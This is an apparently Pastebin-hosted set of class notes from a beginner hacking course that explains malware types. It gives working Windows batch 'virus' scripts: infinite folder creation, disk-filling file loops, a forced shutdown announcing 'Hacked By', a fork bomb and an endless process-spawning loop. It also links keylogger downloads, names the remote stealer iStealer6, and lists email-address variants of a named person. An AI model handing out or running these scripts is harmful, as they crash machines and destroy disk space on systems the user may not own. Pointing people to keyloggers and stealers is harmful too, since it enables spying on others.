Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Session 5
- =========
- Malware Illustration
- --------------------
- MAL = MALicious
- WARE = softWARE
- MALWARE --> MALicious softWARE
- To destroy the system, harm the system, can be used for spying a system.
- It can be anything
- Software
- Tool
- Application
- Code Snipet
- File
- MP3
- Picture
- Text
- Types Of Malware:
- 1. Spyware
- 2. Virus
- 3. Worm
- 4. Trojan
- 5. Keyloggers
- 6. Adware
- 7. Ransomware
- 8. Botnet
- 9. Rootkits
- 1. Virus
- ========
- Vital Information Resource Under Seize
- These are the applications, tools, software, code snippets which can harm your system.
- Hang
- Slow Down
- Hidden
- Replicate
- Delete
- Extension Change
- Batch File Virus --> .bat --> Windows OS
- 1. Infinite Folders
- :maitreya
- mkdir %random%
- goto maitreya
- 2. Space Consuming Virus
- :selfie
- mkdir alome
- cd alome
- echo "Aa gya hero alome, Dhinchak Pooja">>dhinchakPooja.txt
- goto selfie
- 3. Space Eating Virus
- echo "Me Hu Don.... Space Kha Jaunga....">>papa.txt
- :mummy
- type papa.txt>>papa.txt
- goto mummy
- 4. Shutdown virus
- shutdown -s -t 10 -c "Hacked By Sahil Hacker"
- 5. Fork Bomb
- %0|%0
- 6. Process calling
- :label
- start cmd.exe -c
- goto label
- Types of Viruses --> 9
- 1. Polymorphic Virus
- 2. Boot Sector Virus
- 3. Time Bomb
- 4. Browser Infector
- 5. Macro Virus
- 6. Multipartite
- vaibhavchaudhary254@gmail.com ---> ***********
- vaibhav.chaudhary254@gmail.com
- v.a.i.b.havchaudhary254@gmail.com
- vaibhav.chaudhary.2.5.4.@gmail.com
- v.a.i.b.h.a.v.c.h.a.u.d.h.a.r.y.2.5.4.@gmail.com
- 2. Keyloggers
- =============
- They are the applications which are used for getting the keystrokes of the target device or the device in which it is installed.
- 1. Local storage Keylogger
- BPK Keylogger
- http://www.blazingtools.com/downloads.html
- Family Keylogger
- http://www.spyarsenal.com/download.html
- 2. Remote Keylogger
- iStealer6
- 3. Ransomware
- =============
- Which encrypts the file and ask you for the money. It encrypts the system file.
Add Comment
Please, Sign In to add comment